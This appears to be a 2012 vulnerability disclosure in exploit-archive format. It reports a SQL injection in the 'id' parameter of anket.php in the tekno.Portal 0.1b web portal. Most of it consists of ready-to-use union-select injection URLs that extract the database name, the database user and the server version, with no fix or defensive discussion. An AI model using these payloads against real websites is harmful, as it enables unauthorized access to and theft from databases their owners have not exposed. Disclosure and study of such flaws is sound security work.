____________________________________________________________________________________ ################################################################ # Title: tekno.Portal 0.1b - SQLi Vulnerability in "anket.php" # ################################################################ Date: [07-25-2012] Author: Socket_0x03 (Alvaro J. Gene) Email: Socket_0x03@xxxxxxxxxxx Website: www.teraexe.com ____________________________________________________________________________________ Vulnerable Application: tekno.Portal Version: 0.1b File: anket.php ____________________________________________________________________________________ SQL Injection: http://www.website.com/teknoportal/anket.php?id=[SQLi] Example of SQLi: http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,database(),5 http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,user(),5 http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,@@version,5 ____________________________________________________________________________________